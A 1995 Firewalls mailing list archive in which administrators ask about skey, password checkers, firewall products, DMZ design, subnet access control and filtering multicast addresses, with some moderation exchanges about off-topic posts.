<199505022250.PAA03039@ix2.ix.netcom.com> Date: Wed, 03 May 95 14:54:28 -0400 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk look in eff.org:/pub/CAF/policies for examples of acceptable use polices from various institutions (academic and commercial). There are some critiques of the policies in there also. -Randy Marchany VA Tech Computing Center From firewalls-owner Wed May 3 12:40:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05589 for firewalls-outgoing; Wed, 3 May 1995 11:58:09 -0700 Received: from javelin.hks.com (javelin.hks.com [192.101.199.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA05584 for ; Wed, 3 May 1995 11:58:06 -0700 Received: from ragnarok.hks.com by javelin.hks.com with smtp (Smail3.1.29.0 #2) id m0s6jd1-0008f3C; Wed, 3 May 95 14:58 EDT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) for firewalls@greatcircle.com id OAA11754; Wed, 3 May 1995 14:58:29 -0400 From: "Jim Littlefield" Message-Id: <9505031458.ZM11752@ragnarok.hks.com> Date: Wed, 3 May 1995 14:58:29 -0400 In-Reply-To: Ben "Security professionals at the Pentagon (fwd)" (May 3, 12:47pm) References: X-Mailer: Z-Mail (3.2.1 15feb95) To: firewalls@greatcircle.com Subject: Re: Security professionals at the Pentagon (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On May 3, 12:47pm, Ben wrote: : Who feels secure knowing that this is the case at our local government : offices? : I was thinking the same thing when I read his original posting. Kinda scary, actually. -- Jim Littlefield From firewalls-owner Wed May 3 13:40:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05975 for firewalls-outgoing; Wed, 3 May 1995 12:07:25 -0700 Received: from rowe.williams.edu (rowe.williams.edu [137.165.4.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA05968 for ; Wed, 3 May 1995 12:07:21 -0700 Received: from bigbird (bigbird.cc.williams.edu) by rowe.williams.edu with SMTP id AA17837 (5.65c/IDA-1.4.4 for ); Wed, 3 May 1995 15:07:45 -0400 Received: by bigbird (4.1/client-1.3) id AA07556; Wed, 3 May 95 15:07:44 EDT Date: Wed, 3 May 1995 15:07:42 -0400 (EDT) From: "James.C.Anderson" Subject: skey on sunos 4.1.3 and "fasict" password program To: Firewalls@greatcircle.com In-Reply-To: <199505030800.BAA14483@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi gang - Is skey available for sunos 4.1.3? If so, where? Also, a pervious sysadmin showed me what he called the "facist" password changer (i.e. no dictionary words, wanted punctuation and/or digits in the password). I'd like it for sunos 4.1.3 also. Thanks Jim ******************************************************************************* Jim Anderson Williams College Systems Manager Center for Computing James.C.Anderson@williams.edu Jesup Hall Williamstown, MA 01267 413-597-2082 ******************************************************************************* From firewalls-owner Wed May 3 13:56:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05934 for firewalls-outgoing; Wed, 3 May 1995 12:06:24 -0700 Received: from moose.usmcs.maine.edu (moose.usmcs.maine.edu [130.111.131.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA05916 for ; Wed, 3 May 1995 12:06:19 -0700 Received: by moose.usmcs.maine.edu (5.57/Ultrix3.0-C) id AA19277; Wed, 3 May 95 15:07:02 -0400 Received: by sleepy.usmcs.maine.edu; (5.65/1.1.8.2/29Mar95-0232PM) id AA14072; Wed, 3 May 1995 15:06:42 -0400 From: Edward Maillet Message-Id: <9505031906.AA14072@sleepy.usmcs.maine.edu> Subject: Summary of break in facts To: firewalls@greatcircle.com Date: Wed, 3 May 1995 15:06:40 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 808 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey All, I got 30-50 replies to my post looking for general information on recent break-ins. All most all of the replies were people requesting any information I received. The list of information I have is small. As one reply commented, most sites would be "reluctant" to admit a break in let alone the details. The List: The Australian Computer Abuse Research at RMIT publishes 'Profiles of Computer Abuse in Australia'. The cost is about $7.00 (US) and the person in charge is Vic Kamay. Read F. Cohen's "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp. $24.95 (US?) There seems to be a new list on Intrusion Detection Systems (IDS) reachable at ids@uow.edu.au That's all I have. ----- Ed Maillet maillet@usmcs.maine.edu From firewalls-owner Wed May 3 14:09:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05774 for firewalls-outgoing; Wed, 3 May 1995 12:02:24 -0700 Received: from uu11.psi.com (uu11.psi.com [38.8.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA05769 for ; Wed, 3 May 1995 12:02:19 -0700 Received: by uu11.psi.com (5.65b/4.0.940727-PSI/PSINet) via UUCP; id AA08977 for ; Wed, 3 May 95 14:54:32 -0400 Received: from blacksun.tyecin.com by tyecin.com (4.1/3.2.012693-TYECIN Systems); id AA15649 for GreatCircle.COM!firewalls; Wed, 3 May 95 11:06:02 PDT Received: (from lanning@localhost) by blacksun.tyecin.com (8.6.10/8.6.10) id LAA30884 for firewalls@GreatCircle.COM; Wed, 3 May 1995 11:07:06 -0700 From: Bob Lanning Message-Id: <199505031807.LAA30884@blacksun.tyecin.com> Subject: distributed passwd program To: firewalls@greatcircle.com Date: Wed, 3 May 1995 11:07:04 -0700 (PDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1312 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am running 7 different unices. SunOS 4.1.1 Solaris 2.3 OSF/1 1.3 Ultrix 4.2 AIX 3 HP-UX 9.01 SCO/OpenDesktop 3.2 Is there a passwd program that I can get that will run on all of them, that would distribute the passwd entries across all the machines? I would like to do it securely(host varification, encrypted data stream ...) Thanks in advance, Bob /* ________just a comment_________________ _________________________________________________________________________ | Robert Hajime Lanning | ____________ | | Systems Administrator | "No more blah, blah, /\ _________\ | | TYECIN Systems, Inc. | blah!" \ \ \______ / | | Four Main Street | -- Kirk, "Miri" \ \ \ / / / | | Los Altos, California 94022 | stardate 2713.6 \ \ \/ / / | | Voice: (415) 949-8501 | \ \/ / / | | Fax: (415) 949-8505 | "Emotions are alien to me. \ / / | | E-Mail: lanning@tyecin.com | I'm a scientist." \/_/ | | "Software Tools for | -- Spock, "This Side of Paradise" | | Manufacturing Management" | stardate 3417.3 | |_____________________________|_________________________________________| */ From firewalls-owner Wed May 3 15:04:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07784 for firewalls-outgoing; Wed, 3 May 1995 12:53:43 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07764 for ; Wed, 3 May 1995 12:53:28 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA08429; Wed, 3 May 95 15:11:23 CDT Received: by mnbp.network.com with Microsoft Mail id <2FA7DF3E@mnbp.network.com>; Wed, 03 May 95 14:53:34 CDT From: Craig McLellan To: Firewalls Subject: FW: Firewalls with distributed GUI management interfaces Date: Wed, 03 May 95 14:52:00 CDT Message-Id: <2FA7DF3E@mnbp.network.com> Encoding: 17 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >The (now) 3 products: > - Brimstone from SOS > - Firewall-1 > - A soon-to-be-released product from Cohesive >All claim to have GUIs that allow remote management of multiple >firewalls and automated setting of most common options (what to pass >from and to where, what to detect, how to respond, etc.). >>From my limited conversations with them, none are perfect, but at least >two are fairly well thought out. No verification done by experiment. You should also check out the Network Systems Corporation security router PCF Tools facility. From firewalls-owner Wed May 3 15:11:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08410 for firewalls-outgoing; Wed, 3 May 1995 13:21:39 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA08405 for ; Wed, 3 May 1995 13:21:37 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s6ksJ-0000GwC; Wed, 3 May 95 13:18 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA15904; Wed, 3 May 1995 13:21:40 +0800 Date: Wed, 3 May 1995 13:21:40 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505032021.AA15904@brittany.oes.amdahl.com> To: bwern@jax.jaxnet.com, Firewalls@greatcircle.com, avolio@tis.com Subject: Re: Help with begining options? X-Sun-Charset: US-ASCII content-length: 2147 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 1. If you won't get money for it, don't do it. Security is too important. > You need to establish that there is a business requirement for your > company to connect up to the Internet. THen you need to establish what > the risks are. The cost model should show that it is worth spending money > to protect your assets or it will show that you don't need an Internet > connection enough to justify the cost. The middle ground of "scrimping" > does not belong in the equation. That sounds reasonable, but I'd bet that most the firewalls on the internet were put together on a shoestring by someone that had an interest. > > 2. No "sacrificial lamb" systems. Any system on the DMZ has to be > protected as well as the firewall. Why? Because I have never yet met > someone in business who was willing to have any of their systems broken > into. Reasons: 1) The report in the NY Times will just say you were > hacked, not that it was a sacrificial system (or if it does, it'll say it > somewhere 10 pages into the paper); 2) your sacrificial lamb system will > be used as a jump off point to launch attacks against MIT or against > some elementary school in Arizona or against whitehouse.gov; 3) your lamb > will be used as a storage point for recipes for bombs or for kiddie porn; > and 4) the term "sacrificial" you will find pertains to you and your > job, not the system :-). One more reason, your sacrificial lamb is an ideal place to install a sniffer to watch all unencrypted packets going into your firewall. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Wed May 3 15:48:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA10627 for firewalls-outgoing; Wed, 3 May 1995 15:09:32 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA10622 for ; Wed, 3 May 1995 15:09:28 -0700 Received: from anubis.network.com by nsco.network.com (4.1/1.34) id AA10058; Wed, 3 May 95 17:27:29 CDT Received: from blefscu.network.com by anubis.network.com (4.1/SMI-4.1) id AA03788; Wed, 3 May 95 17:08:49 CDT Date: Wed, 3 May 95 17:08:49 CDT From: amolitor@anubis.network.com (Andrew Molitor) Message-Id: <9505032208.AA03788@anubis.network.com> To: firewalls@greatcircle.com Subject: Re: Security professionals at the Pentagon (fwd) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can we avoid the busting on random people who are most likely not here to defend themselves, and try to get our little minds out of the 'All the world's Unix, and anyone who doesn't see the world through Unix colored glasses is a moron' gutter? Perhaps it's just me, but I don't think this is an appropriate forum for ridiculing people for not being Unix experts. I'm not sure what is an appropriate forum, actually, but again, perhaps it's just me. Andrew From firewalls-owner Wed May 3 16:09:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA12030 for firewalls-outgoing; Wed, 3 May 1995 15:59:25 -0700 Received: from fsa.cpsc.ucalgary.ca (fsa.cpsc.ucalgary.ca [136.159.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA12023 for ; Wed, 3 May 1995 15:59:21 -0700 Received: from linux.cpsc.ucalgary.ca (linux.cpsc.ucalgary.ca [136.159.3.100]) by fsa.cpsc.ucalgary.ca (1.8) id ; Wed, 3 May 1995 16:58:51 -0600 Received: by linux.cpsc.ucalgary.ca (1.5; from uucp@localhost) id ; Wed, 3 May 1995 17:21:14 -0600 Received: by virtual.cuc.ab.ca (4.1/tdr1.0) id AA14789; Wed, 3 May 95 08:50:19 MDT Date: Wed, 3 May 95 08:50:19 MDT From: firewall@virtual.cuc.ab.ca (Firewall mailing list) Message-Id: <9505031450.AA14789@virtual.cuc.ab.ca> To: firewalls@GreatCircle.COM Subject: mirror site(s) for ip_fil2.5.2 ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i am interested in inspecting ip_fil2.5.2, but can never seem to get on to the anonymous server at coombs.anu.edu.au. are there mirror sites for this package, or failing that, can some kind soul email me aforementioned package? From firewalls-owner Wed May 3 16:16:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA10411 for firewalls-outgoing; Wed, 3 May 1995 15:00:13 -0700 Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA10406 for ; Wed, 3 May 1995 15:00:08 -0700 From: fc@all.net (Dr. Frederick B. Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA05791 for firewalls@greatcircle.com; Wed, 3 May 95 17:56:18 EDT Message-Id: <9505032156.AA05791@all.net> Subject: password checking program to force hard-to-guess passwords To: firewalls@greatcircle.com Date: Wed, 3 May 1995 17:56:17 -0400 (EDT) X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 519 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Naturally - we have one - see our W3 server listed below for details. -- ----------------- \Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236 \ /\/ | Check out info-security heaven and test your system \/\ /\/ | for known vulnerabilities (1st time for free) at URL: \/Analytics| (scans deeper than SATAN or ISS) http://all.net:8080 ----------------- Read "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 From firewalls-owner Wed May 3 16:24:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA10452 for firewalls-outgoing; Wed, 3 May 1995 15:02:31 -0700 Received: from mis-unix1.lax.trane.com ([159.112.20.101]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA10446 for ; Wed, 3 May 1995 15:02:27 -0700 Date: Wed, 3 May 1995 15:02:27 -0700 From: laxnn@TRANE.LAXBLDG17.lax.trane.com Message-Id: <199505032202.PAA10446@miles.greatcircle.com> Subject: Marchany re Policies Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From laxnn Wed May 03 17:04:00 PDT 1995 remote from TRANE.LAXBLDG17.lax.trane.com Received: from TRANE.LAXBLDG17.lax.trane.com by mis-unix1.lax.trane.com; Wed, 3 May 1995 17:01 CDT Received: by Lilies.lax.trane.com with Microsoft Mail id <2FA81A3F@Lilies.lax.trane.com>; Wed, 03 May 95 17:05:19 PDT From: "Norton, Dave" To: 'firewalls list' Date: Wed, 03 May 95 17:04:00 PDT Message-ID: <2FA81A3F@Lilies.lax.trane.com> Encoding: 17 TEXT X-Mailer: Microsoft Mail V3.0 Content-Type: text Content-Length: 617 Randy, please indulge me and be a little more explicit about how one gets to this info... I don't seem to be able to get into "eff.org"... Soas not to offend the rocket scientists in the list, please direct any help you can offer to my apparently "newbie" question to "dnorton@trane.com"... (Networks to run, no time to surf)... Thanx ! Dave Norton Trane / LaCrosse, WI ---------- >look in eff.org:/pub/CAF/policies for examples of acceptable use polices from >various institutions (academic and commercial). There are some critiques of >the policies in there also. >Randy Marchany >VA Tech Computing Center From firewalls-owner Wed May 3 17:15:31 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA13194 for firewalls-outgoing; Wed, 3 May 1995 16:46:26 -0700 Received: from hightop.nrl.navy.mil (hightop.nrl.navy.mil [132.250.142.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA13183 for ; Wed, 3 May 1995 16:46:23 -0700 Received: (from bowyer@localhost) by hightop.nrl.navy.mil (8.6.10/8.6.9) id TAA18717; Wed, 3 May 1995 19:49:43 -0400 From: "J." Message-Id: <199505032349.TAA18717@hightop.nrl.navy.mil> Subject: Re: Security professionals at the Pentagon (fwd) To: amolitor@anubis.network.com (Andrew Molitor) Date: Wed, 3 May 1995 19:49:43 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505032208.AA03788@anubis.network.com> from "Andrew Molitor" at May 3, 95 05:08:49 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 762 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ] Can we avoid the busting on random people who are most likely not ] here to defend themselves, and try to get our little minds out of the They're not. ] 'All the world's Unix, and anyone who doesn't see the world through ] Unix colored glasses is a moron' gutter? Good idea. Besides, a big part of the problem is that the person who requested the help is deaf. He's bright, he's learning; so perhaps security is not his forte -- but I'd be willing to bet he could outdo the person who criticized him in something else. ] Perhaps it's just me, but I don't think this is an appropriate ] forum for ridiculing people for not being Unix experts. I'm not sure what ] is an appropriate forum, actually, but again, perhaps it's just me. It's not just you. From firewalls-owner Wed May 3 18:09:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA14866 for firewalls-outgoing; Wed, 3 May 1995 18:00:30 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA14861; Wed, 3 May 1995 18:00:26 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 3 May 1995 18:01:02 -0800 To: Ben , Marco Polo , Matthew Elvey , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Security professionals at the Pentagon (fwd) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:47 PM 5/3/95, Ben wrote: >Who feels secure knowing that this is the case at our local government >offices? What's this got to do with Firewalls? And whose local government offices are you referring to? 25% of the subscribers to Firewalls are from non-USA domains. Such postings as this and the "Dan Farmer Rap" posted last month, which are would-be attempts at humor at the expense of some individual or group, are not welcome on the Firewalls mailing list. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Wed May 3 18:39:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA15097 for firewalls-outgoing; Wed, 3 May 1995 18:28:04 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA15092 for ; Wed, 3 May 1995 18:28:01 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQyoev12433; Wed, 3 May 1995 21:28:26 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA07829; Wed, 3 May 95 21:23:48 EDT Date: Wed, 3 May 1995 21:23:47 -0400 (EDT) From: Sick Puppy Subject: Access control across a large network - firewall or other system? To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following describes a real life situation. There is a large (class B) network that has users performing much different functions on different subnets. They have about 200 subnets (class C networks) connected together through several Cisco 7000 routers. For pretty good reasons the users of different subnets don't trust each other. In particular, some of the programmers of financial systems have tried to crack accounts of other people on database systems that the financial programmers are not supposed to use. Users on some subnets are paranoid that the work they are doing might be leaked to the press while users on other subnets really like the attention they get from the press. As the network has grown, some users have installed their own insecure dial-up links to other networks instead of using the secure corporate links. For all I know, this could describe many large corporations. However, there is a clear need to protect the different subnets from each other and to limit what other systems in the class B network the users on any particular subnet can connect to. In short, they need a centralized access control mechanism that blocks unwanted connections. I know that the Night Hawk from Harris Corp. can be used to provide this kind of centralized access control and in fact it is the only box I have come across that can do this kind of thing. I would like to know what other alternatives exist. Could this kind of access control be provided by centralized firewalls or is some dedicated access control system needed? Sick Puppy From firewalls-owner Wed May 3 19:09:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA15449 for firewalls-outgoing; Wed, 3 May 1995 18:43:35 -0700 Received: from aruba.lerc.nasa.gov (aruba.lerc.nasa.gov [139.88.35.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA15437; Wed, 3 May 1995 18:43:25 -0700 Received: from nyjets.lerc.nasa.gov by aruba.lerc.nasa.gov with ESMTP (950215.SGI.8.6.10/LeRC/DLW/TAF(1.24-main)) id VAA06425; Wed, 3 May 1995 21:43:45 -0400 Received: by nyjets.lerc.nasa.gov (950215.SGI.8.6.10/LeRC/DLW/TAF(1.22p-local)) id VAA04761; Wed, 3 May 1995 21:43:45 -0400 From: bnowlin@nyjets.lerc.nasa.gov (Ben Nowlin) Message-Id: <199505040143.VAA04761@nyjets.lerc.nasa.gov> Subject: Re: Security professionals at the Pentagon (fwd) To: Brent@GreatCircle.COM (Brent Chapman) Date: Wed, 3 May 95 21:43:44 EDT Cc: samman@CS.YALE.EDU, mrami@mramirez.sy.YALE.EDU, elvey@CS.YALE.EDU, firewalls@greatcircle.com In-Reply-To: ; from "Brent Chapman" at May 3, 95 6:01 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >Who feels secure knowing that this is the case at our local government > >offices? > > What's this got to do with Firewalls? > > And whose local government offices are you referring to? 25% of the > subscribers to Firewalls are from non-USA domains. > > Such postings as this and the "Dan Farmer Rap" posted last month, which are > would-be attempts at humor at the expense of some individual or group, are > not welcome on the Firewalls mailing list. > > > -Brent Thank you, Ben -- ______________________________________________________________________________ | Ben Nowlin | If you don't get what you want in life, it's either NASA Lewis Research Center | a sign that you seriously didn't want it, or that ben@lerc.nasa.gov | you tried to BARGAIN over the PRICE. ______________________________________________________________________________ From firewalls-owner Wed May 3 19:39:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16670 for firewalls-outgoing; Wed, 3 May 1995 19:36:24 -0700 Received: from styx.uwa.edu.au (styx.uwa.edu.au [130.95.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA16665 for ; Wed, 3 May 1995 19:36:02 -0700 Received: (uucp@localhost) by styx.uwa.edu.au (8.6.11/8.6.4) id PAA32362 for firewalls@greatcircle.com; Tue, 2 May 1995 15:36:17 +0800 Received: from zen.hq.adied.oz.au by adied.oz.au (4.1/SMI-4.1+adied-1.3) id AA15779; Tue, 2 May 95 15:27:46 WST Received: by zen.hq.adied.oz.au (5.57/Ultrix3.0-C) id AA29646; Tue, 2 May 95 17:28:24 +1000 Received: from cc:Mail by smtp_gwy.hq.adied.oz.au id AA799460899; Tue, 02 May 95 17:27:37 EST Date: Tue, 02 May 95 17:27:37 EST From: "Bui, Hung" Message-Id: <9504027994.AA799460899@smtp_gwy.hq.adied.oz.au> To: firewalls@GreatCircle.COM Subject: Raptor Eagle Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Does anyone have any opinions on a firewall product from Raptor called Eagle? Thanks for your help. Hung Bui hsb@zen.hq.adied.oz.au From firewalls-owner Wed May 3 19:56:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16706 for firewalls-outgoing; Wed, 3 May 1995 19:37:23 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA16700 for ; Wed, 3 May 1995 19:37:19 -0700 Received: by little-miami.iac.net id WAA23245; Wed, 3 May 1995 22:37:33 -0400 Date: Wed, 3 May 1995 22:37:31 -0400 (EDT) From: Carl Jolley To: Sick Puppy cc: firewalls@GreatCircle.COM Subject: Re: Access control across a large network - firewall or other system? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 3 May 1995, Sick Puppy wrote: > The following describes a real life situation. > > There is a large (class B) network that has users performing much > different functions on different subnets. They have about 200 subnets > (class C networks) connected together through several Cisco 7000 > routers. > For pretty good reasons the users of different subnets don't trust each > other. In particular, some of the programmers of financial systems have > tried to crack accounts of other people on database systems that the financial > programmers are not supposed to use. Users on some subnets are paranoid that > the work they are doing might be leaked to the press while users on other > subnets really like the attention they get from the press. As the network has > grown, some users have installed their own insecure dial-up links to > other networks instead of using the secure corporate links. > > For all I know, this could describe many large corporations. However, > there is a clear need to protect the different subnets from each other > and to limit what other systems in the class B network the users on > any particular subnet can connect to. In short, they need a centralized > access control mechanism that blocks unwanted connections. This Class B network belongs to one organization or corporation??? If this is true, then what they need first and foremost is a corporate secuity policy. It might include something like: "Any employee of this company who cracks or tries to crack anyone's account, whether that other person is an employee of this company or not, is subject to immediate termination of employment and will be reported to the appropriate law enforement agencies for prosecution." > > I know that the Night Hawk from Harris Corp. can be used to provide this > kind of centralized access control and in fact it is the only box I > have come across that can do this kind of thing. I would like to know what > other alternatives exist. > > Could this kind of access control be provided by centralized firewalls or is > some dedicated access control system needed? > > Sick Puppy > > > > **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Wed May 3 20:09:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16935 for firewalls-outgoing; Wed, 3 May 1995 19:45:51 -0700 Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA16928 for ; Wed, 3 May 1995 19:45:47 -0700 From: fc@all.net (Dr. Frederick B. Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA04054 for firewalls@greatcircle.com; Wed, 3 May 95 22:42:01 EDT Message-Id: <9505040242.AA04054@all.net> Subject: Pentagon security professionals To: firewalls@greatcircle.com Date: Wed, 3 May 1995 22:42:01 -0400 (EDT) X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1673 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Boy - you firewallers are touchy aren't you. Someone makes a few comments about national security and everyone hops on the posting party like they were posting something more interesting and open discussion of such things is somehow wrong. I thought the posting was entirely appropriate but then many of my postings are hated as well. So here's my nickle: DISA is generally far better at security than that example showed. Furthermore, they are understaffed and overworked and defending our country (the US) against ongoing attacks. If you're not from the US try not to be offended by a little bit of patriotism. Our country needs defending and we help to defend much of the rest of the world. This notwithstanding, that level of naivity should give notice to those of us who know more that our educational functions have not been adequately fulfilled. Many people charged with similar roles in large financial institutions face similar knolwedge gaps. I think that this is highly relevant to firewalls and is the kind of thing we need to see on occasion to remind us of the size of the gap between the discussions on this forum and most of the information technology world. Please feel free to flame away. -- ----------------- \Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236 \ /\/ | Check out info-security heaven and test your system \/\ /\/ | for known vulnerabilities (1st time for free) at URL: \/Analytics| (scans deeper than SATAN or ISS) http://all.net:8080 ----------------- Read "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 From firewalls-owner Wed May 3 20:28:42 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16064 for firewalls-outgoing; Wed, 3 May 1995 19:19:17 -0700 Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA16053 for ; Wed, 3 May 1995 19:19:13 -0700 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id TAA06153; Wed, 3 May 1995 19:28:32 -0700 Date: Wed, 3 May 1995 19:28:31 -0700 (PDT) From: Tim Keanini To: firewalls@greatcircle.com Subject: blocking class D and class E address at the filter Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I have a concern that I want to ask the firewall community. In BSD4.4 , there is no way to take MULTICAST out of the kernel period. At least, that is what I have been told about my BSD/OS 2.x that is based on the 4.4BSD code. Yes I have the source licence but there is the answer that I got from BSD/OS. At my packet filters, I would like to block address that are 224.0.0.0 and above. I am wondering what you folks think about this: deny 224.0.0.0/3 DMZnet/24 log If my TI-36x Solar calculator is correct, this should mean that Class D and Class E should match the source IP and be blocked. Anyone with any luck on this? I am going to try it tomorrow at my test site. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / for more info on BayMOO... \ \ email baymoo@worldbit.com / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Wed May 3 20:39:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA18142 for firewalls-outgoing; Wed, 3 May 1995 20:25:47 -0700 Received: from cseic.saic.com (CSEIC.SAIC.COM [139.121.32.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with 